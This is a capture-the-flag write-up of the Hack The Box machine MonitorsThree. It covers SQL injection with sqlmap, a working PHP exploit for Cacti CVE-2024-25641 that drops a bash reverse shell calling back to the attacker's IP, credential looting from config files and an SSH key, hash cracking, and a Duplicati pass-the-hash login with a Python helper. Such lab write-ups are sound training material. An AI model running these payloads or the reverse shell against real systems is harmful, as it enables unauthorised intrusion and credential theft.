Hi everyone, this time I'll walk through the Hack The Box machine monitorsthree.
As usual we start with an nmap scan of the target; the command I used was nmap -sSCV 10.10.11.30 -T5
┌──(root㉿kali)-[~]
└─# nmap -sSCV 10.10.11.30 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 06:28 EST
Nmap scan report for 10.10.11.30
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_ 256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8084/tcp filtered websnp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.82 seconds

Open the website on TCP port 80 in a browser.

The interesting part is the password-reset page, /forgot_password.php.

Enter an arbitrary value in the username field and capture the request with Burp Suite.

Save that request to a file and hand it to sqlmap:
┌──(root㉿kali)-[~/latihan]
└─# cat request.txt
POST /forgot_password.php HTTP/1.1
Host: monitorsthree.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://monitorsthree.htb
Connection: keep-alive
Referer: http://monitorsthree.htb/forgot_password.php
Cookie: PHPSESSID=14qckn8kokvi5e7jaiv6is6kut
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=asdasd
┌──(root㉿kali)-[~/latihan]
└─# sqlmap -r request.txt --batch --dbms=MySQL --dbs
[sqlmap banner] {1.8.11#stable} https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:36:32 /2024-12-16/
[06:36:32] [INFO] parsing HTTP request from 'request.txt'
[06:36:32] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[06:36:34] [INFO] testing if the target URL content is stable
[06:36:36] [WARNING] POST parameter 'username' does not appear to be dynamic
[06:36:38] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[06:36:40] [INFO] testing for SQL injection on POST parameter 'username'
[06:36:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:36:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[06:36:51] [INFO] testing 'Generic inline queries'
[06:36:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[06:38:26] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[06:38:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:38:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
Once the database name is known, the next step is to dump the username and password columns of its users table, which turns up several accounts. Since sqlmap identified the parameter as time-based blind injectable (the SLEEP result above), expect this dump to be slow: every character is recovered by measuring response delays.
Table: users
[4 entries]
+-----------+----------------------------------+
| username | password |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f29242...... |
| admin | 31a181c8372e3afc59dab86343...... |
| dthompson | 633b683cc128fe244b00f176c8...... |
| mwatson | c585d01f2eb3e6e1073e9202........ |
+-----------+----------------------------------+
Next we crack the admin hash with CrackStation; the 32-character hashes look like unsalted MD5, so an online lookup is enough.

Next we fuzz for virtual hosts (subdomains) of the target with ffuf:
┌──(root㉿kali)-[~/latihan]
└─# ffuf -c -ac -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.monitorsthree.htb' -u http://monitorsthree.htb
[ffuf banner] v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsthree.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.monitorsthree.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 251ms]
This gives us the cacti subdomain; add it to /etc/hosts like the main domain and open it in the browser.

Log in with the admin:green….. credentials recovered earlier.

We're in. The installed Cacti is version 1.2.26, which is vulnerable to CVE-2024-25641: the package import feature verifies the package signature against a public key shipped inside the package itself and writes the contained files to disk without sanitising their paths, so anyone with import rights can plant a PHP file under the web root. The PHP script below builds such a package; save it as test.php.
<?php
// Package XML: one file entry plus the public key used to verify it.
// Cacti < 1.2.27 checks the signatures against this embedded key, so a
// freshly generated key pair is accepted as "trusted".
$xmldata = "<xml>
<files>
<file>
<name>resource/test.php</name>
<data>%s</data>
<filesignature>%s</filesignature>
</file>
</files>
<publickey>%s</publickey>
<signature></signature>
</xml>";
// File that gets written to <cacti>/resource/test.php: a bash reverse shell
// back to the attacker (adjust IP/port to your listener).
$filedata = '<?php exec("bash -c \'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1\'") ?>';
// Generate a throwaway key pair; its public half goes into the package.
$keypair = openssl_pkey_new();
$public_key = openssl_pkey_get_details($keypair)["key"];
// Sign the file contents, then the whole package, with that key.
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("test.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
// Cacti expects the package gzip-compressed.
system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");
?>
Running the script writes test.xml and gzips it to test.xml.gz:
┌──(root㉿kali)-[~/latihan]
└─# php test.php
┌──(root㉿kali)-[~/latihan]
└─# ls
request.txt test.php test.xml.gz
Upload that file through Cacti's Import/Export feature.

Start a listener on port 4444, run the import, then request the dropped file at http://cacti.monitorsthree.htb/cacti/resource/test.php to trigger the reverse shell:
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.30] 47810
bash: cannot set terminal process group (1218): Inappropriate ioctl for device
bash: no job control in this shell
www-data@monitorsthree:~/html/cacti/resource$ whoami
whoami
www-data
www-data@monitorsthree:~/html/cacti/resource$
The database credentials are in Cacti's config file, include/config.php:
www-data@monitorsthree:~/html/cacti/include$ cat config.php
cat config.php
<?php
$database_type = 'mysql';
$database_default = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cacti....';
$database_password = 'cac......';
$database_port = '3306';
$database_retries = 5;
$database_ssl = false;
$database_ssl_key = '';
$database_ssl_cert = '';
$database_ssl_ca = '';
$database_persist = false;
Connect to MySQL with those credentials:
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.30] 50044
bash: cannot set terminal process group (1218): Inappropriate ioctl for device
bash: no job control in this shell
www-data@monitorsthree:~/html/cacti/resource$ mysql -u cac...... -p cacti
mysql -u cactiuser -p cacti
Enter password: cactiu....
and read the user_auth table:
USE cacti;
show tables;
SELECT * FROM user_auth;
This returns three accounts; the password column holds bcrypt ($2y$) hashes:
id username password realm full_name email_address must_change_password password_change show_tree show_list show_preview graph_settings login_opts policy_graphs policy_trees policy_hosts policy_graph_templates enabled lastchange lastlogin password_history locked failed_attempts lastfail reset_perms
1 admin $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApm............ 0 Administrator marcus@monitorsthree.htb on on on on 2 11 1 1 on -1 -1 -1 0 0 436423766
3 guest $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6............. 0 Guest Account guest@monitorsthree.htb on on on 1 1 11 1 -1 -1 -1 0 0 3774379591
4 marcus $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9..................... 0 Marcus marcus@monitorsthree.htb on on on on on 1 1 11 1 on -1 -1 0 0 1677427318
Next we crack marcus's hash with hashcat (bcrypt, mode 3200).

hashcat returns the plaintext; use it to su to marcus.

In /home/marcus/.ssh there is an SSH key pair. Copy id_rsa to the attacking machine and set its permissions to 600:
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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........................................................
UdlPWmX9KBrTo4shGXYqytDCOUpq738zginrfiDDtO5Do4oVqN/a83X/ibBQuC0HaC0NDA
HvLQy0D4YQ6/8wE0K8MFqKUHpE2VQJvTLFl7UZ4dVkAv4JhYStnM1ZbVt5kNyQzIn1T030
zAwVsn0tmQYsTHWPSrYgd3+36zDnAJt+koefv3xsmhnYEZwruXTZYW0EKqLuKpem7algzS
Dkykbe/YupujChCK0u5KY2JL9a+YDQn7mberAY31KPAyOB66ba60FUgwECw0J4eTLMjeEA
bppHadb5vQKH2ZhebpQlTiLEs2h9h9cwuW4GrJl3vcVqV68ECGwqr7/7OvlmyUgzJFh0+8
/MFEq8iQ0VY4as4y88aMCuqDTT1x6Zqg1c8DuBeZkbvRDnU6IJ/qstLGfKmxg6s+VXpKlB
iYckHk0TAs6FDngfxiRHvIAh8Xm+ke4ZGh59WJyPHGJ/6yh3ie7Eh+5h/fm8QRrmOpAAAA
wHvDgC5gVw+pMpXUT99Xx6pFKU3M1oYxkhh29WhmlZgvtejLnr2qjpK9+YENfERZrh0mv0
GgruxPPkgEtY+MBxr6ycuiWHDX/xFX+ioN2KN2djMqqrUFqrOFYlp8DG6FCJRbs//sRMhJ
bwi2Iob2vuHV8rDhmRRq12iEHvWEL6wBhcpFYpVk+R7XZ5G4uylCzs27K9bUEW7iduys5a
ePG4B4U5NV3mDhdJBYtbuvwFdL7J+eD8rplhdQ3ICwFNC1uQAAAMEA03BUDMSJG6AuE6f5
U7UIb+k/QmCzphZ82az3Wa4mo3qAqulBkWQn65fVO+4fKY0YwIH99puaEn2OKzAGqH1hj2
y7xTo2s8fvepCx+MWL9D3R9y+daUeH1dBdxjUE2gosC+64gA2iF0VZ5qDZyq4ShKE0A+Wq
4sTOk1lxZI4pVbNhmCMyjbJ5fnWYbd8Z5MwlqmlVNzZuC+LQlKpKhPBbcECZ6Dhhk5Pskh
316YytN50Ds9f+ueqxGLyqY1rHiMrDAAAAwQDN4jV+izw84eQ86/8Pp3OnoNjzxpvsmfMP
BwoTYySkRgDFLkh/hzw04Q9551qKHfU9/jBg9BH1cAyZ5rV/9oLjdEP7EiOhncw6RkRRsb
e8yphoQ7OzTZ0114YRKdafVoDeb0twpV929S3I1Jxzj+atDnokrb8/uaPvUJo2B0eDOc7T
z6ZnzxAqKz1tUUcqYYxkCazMN+0Wx1qtallhnLjy+YaExM+uMHngJvVs9zJ2iFdrpBm/bt
PA4EYA8sgHR2kAAAAUbWFyY3VzQG1vbml0b3JzdGhyZWUBAgMEBQYH
-----END OPENSSH PRIVATE KEY-----
└─# nano id_rsa
┌──(root㉿kali)-[~/]
└─# chmod 600 id_rsa
Now log in with that private key; user.txt is in marcus's home directory:
└─# ssh -i id_rsa marcus@monitorsthree.htb
The authenticity of host 'monitorsthree.htb (10.10.11.30)' can't be established.
ED25519 key fingerprint is SHA256:1llzaKeglum8R0dawipiv9mSGU33yzoUW3frO9MAF6U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'monitorsthree.htb' (ED25519) to the list of known hosts.
Last login: Mon Dec 16 10:12:14 2024 from 10.10.14.14
marcus@monitorsthree:~$ whoami
marcus
marcus@monitorsthree:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitorsthree:~$ ls
root root.txt user.txt
marcus@monitorsthree:~$ cat user.txt
dcfb8aa1108a7.............
Next we enumerate the services listening only on localhost (ss -tlnp or netstat -tlnp will show them).

Port 8200 is the interesting one; forward it through SSH:
└─# ssh marcus@monitorsthree.htb -L 8200:127.0.0.1:8200 -i id_rsa
Last login: Mon Dec 16 12:24:18 2024 from 10.10.14.20
marcus@monitorsthree:~$ whoami
marcus
marcus@monitorsthree:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
Open http://127.0.0.1:8200 in the browser.

It's Duplicati. Its configuration directory holds a set of SQLite databases:
marcus@monitorsthree:/opt/duplicati/config$ ls
BEJZYCVRCL.sqlite KAPRMUPHBU.sqlite SVQHETYBIZ.sqlite
control_dir_v2 KSOKYQRGYW.sqlite YAIBQSHEEN.sqlite
CTADPNHLTC.sqlite MUJQFASYFF.sqlite
Duplicati-server.sqlite SRDLRZHWGJ.sqlite
marcus@monitorsthree:/opt/duplicati/config$
Download Duplicati-server.sqlite with scp:
┌──(root㉿kali)-[~/latihan]
└─# scp -i id_rsa marcus@monitorsthree.htb:/opt/duplicati/config/Duplicati-server.sqlite .
Duplicati-server.sqlite
Open it with sqlite3 and look at the Option table:
└─# sqlite3 Duplicati-server.sqlite
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
Backup Log Option TempFile
ErrorLog Metadata Schedule UIStorage
Filter Notification Source Version
sqlite> SELECT * from Option;
4||encryption-module|
4||compression-module|zip
4||dblock-size|50mb
4||--no-encryption|true
-1||--asynchronous-upload-limit|50
-1||--asynchronous-concurrent-upload-limit|50
-2||startup-delay|0s
-2||max-download-speed|
-2||max-upload-speed|
-2||thread-priority|
-2||last-webserver-port|8200
-2||is-first-run|
-2||server-port-changed|True
-2||server-passphrase|Wb6e855L3sN9LTaC.......................
-2||server-passphrase-salt|xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
-2||server-passphrase-trayicon|b37b4dd0-4b8e-444a-8ab3-69621532d747
-2||server-passphrase-trayicon-hash|FgfAQcfzB0ZD3JlehexXU+49ISpfSFjcysqsJofnwUg=
-2||last-update-check|638699303127336780
-2||update-check-interval|
-2||update-check-latest|
-2||unacked-error|True
-2||unacked-warning|False
-2||server-listen-interface|any
-2||server-ssl-certificate|
-2||has-fixed-invalid-backup-id|True
-2||update-channel|
-2||usage-reporter-level|
-2||has-asked-for-password-protection|true
-2||disable-tray-icon-login|false
-2||allowed-hostnames|*
On the Duplicati login page, enter any password and watch the request in Burp:

The salt in the login exchange matches the server-passphrase-salt value from the database. Instead of cracking the passphrase, we can use the stored server-passphrase hash directly; first convert it from base64 to hex:
echo 'Wb6e855L3sN9LTaCuwPXuau.............' | base64 -d | xxd -p -c 256
This is the salted password hash in hex (the saltedpwd value used below).

This step is somewhat fiddly:
1. Turn on interception in Burp Suite
2. Enter any password in the Duplicati login form
3. Intercept the first login request and its response; the response contains a Nonce value

Save that nonce, open the browser console, and run:
var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb............';
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);
For the full procedure see https://github.com/duplicati/duplicati/issues/5197: the computed noncedpwd replaces the password field in the second login request, so the plaintext passphrase is never needed.
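The same computation in Python, so it can be checked without a browser console. This is an added example, not code from the write-up or from Duplicati. nonced_password is the console snippet above ported to Python; salted_password is the preceding step (how server-passphrase is derived from the plaintext and server-passphrase-salt), assumed to be the same client-side scheme described in the linked issue: SHA256 over utf8(password) || salt. The salt, nonce and password below are constructed, not the box's real values.

```python
"""Duplicati web-UI login hashes (added example, see lead-in)."""
import base64
import hashlib

# Constructed sample values; the real ones come from the Option table
# (server-passphrase, server-passphrase-salt) and the login response in Burp.
SAMPLE_SALT_B64 = base64.b64encode(bytes([0x11] * 32)).decode()
SAMPLE_NONCE_B64 = base64.b64encode(bytes(range(32))).decode()
SAMPLE_PASSWORD = "constructed-password"


def salted_password(password: str, salt_b64: str) -> str:
    """server-passphrase as stored: base64(SHA256(utf8(password) || salt)).
    Assumed derivation, see lead-in."""
    data = password.encode("utf-8") + base64.b64decode(salt_b64)
    return base64.b64encode(hashlib.sha256(data).digest()).decode()


def to_hex(b64: str) -> str:
    """The write-up's `base64 -d | xxd -p` step."""
    return base64.b64decode(b64).hex()


def nonced_password(salted_b64: str, nonce_b64: str) -> str:
    """Login token: base64(SHA256(nonce_bytes || salted_bytes)).

    Pass-the-hash: only the stored salted hash is needed, never the
    plaintext. The nonce is issued per login attempt, so the token must be
    computed for the nonce returned in the current exchange.
    """
    data = base64.b64decode(nonce_b64) + base64.b64decode(salted_b64)
    return base64.b64encode(hashlib.sha256(data).digest()).decode()


def nonced_password_cryptojs_style(salted_hex: str, nonce_b64: str) -> str:
    """Literal port of the console snippet, to show why it works.

    In CryptoJS, `Base64.parse(nonce) + saltedpwd` stringifies the nonce
    WordArray as hex and appends the hex salted hash; Hex.parse then turns
    that back into the raw bytes nonce || salted. That is why the write-up
    first converts server-passphrase to hex with xxd.
    """
    raw = bytes.fromhex(base64.b64decode(nonce_b64).hex() + salted_hex)
    return base64.b64encode(hashlib.sha256(raw).digest()).decode()


def token_from_password(password: str, salt_b64: str, nonce_b64: str) -> str:
    """What a legitimate client sends, for comparison."""
    return nonced_password(salted_password(password, salt_b64), nonce_b64)


if __name__ == "__main__":
    stored = salted_password(SAMPLE_PASSWORD, SAMPLE_SALT_B64)
    print("server-passphrase:", stored)
    print("login token      :", nonced_password(stored, SAMPLE_NONCE_B64))
```

The design flaw this exploits is that the salted hash stored in the database is itself the credential: the nonce only protects against replay of a captured token, not against someone who can read the Option table.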
Once logged in, add a new backup.


Add the folder manually:

Enter the path /source/root/root.txt and click 'Add path'. Duplicati's view of the filesystem is rooted at /source, so /source/root/root.txt is /root/root.txt on the host.

Disable 'automatically run backups', click Next and then Save. Refresh the page and a backup named root_flag appears.

Click 'Run now', then switch to the Restore menu.


Select root.txt and click Continue. Then choose 'Pick location', enter the path /source/home/marcus/root.txt (marcus's home directory, seen through the same /source prefix) and click Continue.


Back in marcus's shell, a root.txt directory now exists in the home directory with the root flag inside:
marcus@monitorsthree:~$ cd root.txt/
marcus@monitorsthree:~/root.txt$ ls
root.txt
marcus@monitorsthree:~/root.txt$ cat root.txt
935c670732bc....................